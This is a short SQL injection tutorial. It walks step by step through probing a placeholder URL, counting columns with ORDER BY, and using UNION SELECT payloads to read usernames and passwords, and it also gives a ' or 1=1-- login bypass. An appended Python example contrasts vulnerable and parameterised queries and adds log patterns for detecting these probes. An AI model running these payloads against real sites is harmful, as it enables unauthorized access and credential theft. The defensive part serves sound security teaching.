SQL injection is a way to read information from a database, log in as an authenticated user, or even delete records in a database. SQL injection can be performed against SQL and MySQL servers. Often, to find a vulnerable server, an attacker will first try simple injections and then escalate to more complex ones. Let's start with an example URL and SQL injection.
Example:
http://injectable-site.com?page=1
We start by adding a simple single quote at the end, like so:
http://injectable-site.com?page=1'
or
http://injectable-site.com?page=1 '1=1--
What we are looking for is an error message stating that there is an error in our SQL syntax. Now let's move on and find the number of columns in the table.
http://injectable-site.com?page=1 order by 1--
http://injectable-site.com?page=1 order by 2--
http://injectable-site.com?page=1 order by 3--
and so on, until the page says "the page cannot be displayed" or "unknown column". The last number that still displayed the page correctly is the number of columns. Now let's try a UNION to see if the command works. You would enter the text as follows:
http://injectable-site.com?page=1 union all select 1,2,3--
Bingo: if the numbers are printed to the screen, unions work. Now let's check for table and column names:
http://injectable-site.com?page=1 union all select 1,2,3 from users--
If the number is still on the screen, the query against that table succeeded; if not, keep guessing.
Now let's see if there are username and password columns:
http://injectable-site.com?page=1 union all select 1,2,username,3 from users--
http://injectable-site.com?page=1 union all select 1,2,password,3 from users--
These are pretty basic examples, and injections can get a lot more complex. There are many tutorials online that go into further detail about dropping tables, adding users, and many other things.
Sometimes an injection is as simple as entering ' or 1=1-- into a login form and getting admin or root; most of the time we have to work for it.
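As an added example (not code from the original page), here is the kind of page lookup that sits behind a URL like the one above, written once with string concatenation and once with a validated, parameterised query, plus a small log check for the probes this page walks through. The schema, table names, secret value and log lines are constructed for the demonstration.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed in-memory schema: a pages table selected by ?page=, and a
# users table that the page's UNION payload reads from.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages(id INTEGER, title TEXT, body TEXT);
        INSERT INTO pages VALUES (1, 'Home', 'Welcome');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'constructed-secret');
    """)
    return conn

def get_page_vulnerable(conn, page):
    # Concatenation: whatever follows ?page= becomes SQL text, so
    # "1 union all select ..." is parsed as a second SELECT.
    sql = "SELECT id, title, body FROM pages WHERE id = " + page
    return conn.execute(sql).fetchall()

def get_page_safe(conn, page):
    # Validate the type first (a page id is an integer), then bind it as a
    # parameter so the database never parses user input as SQL.
    try:
        page_id = int(page)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, title, body FROM pages WHERE id = ?", (page_id,)
    ).fetchall()

# Detection: the probes above (a stray quote with 1=1, ORDER BY n, UNION SELECT)
# are easy to spot in access logs once the query string is URL-decoded.
PROBE_PATTERNS = [
    re.compile(r"'\s*(or\s+)?1\s*=\s*1", re.I),
    re.compile(r"\border\s+by\s+\d+", re.I),
    re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
]

def flag_requests(log_lines):
    # Returns the original log lines whose decoded request matches a probe.
    flagged = []
    for line in log_lines:
        if any(p.search(unquote_plus(line)) for p in PROBE_PATTERNS):
            flagged.append(line)
    return flagged
```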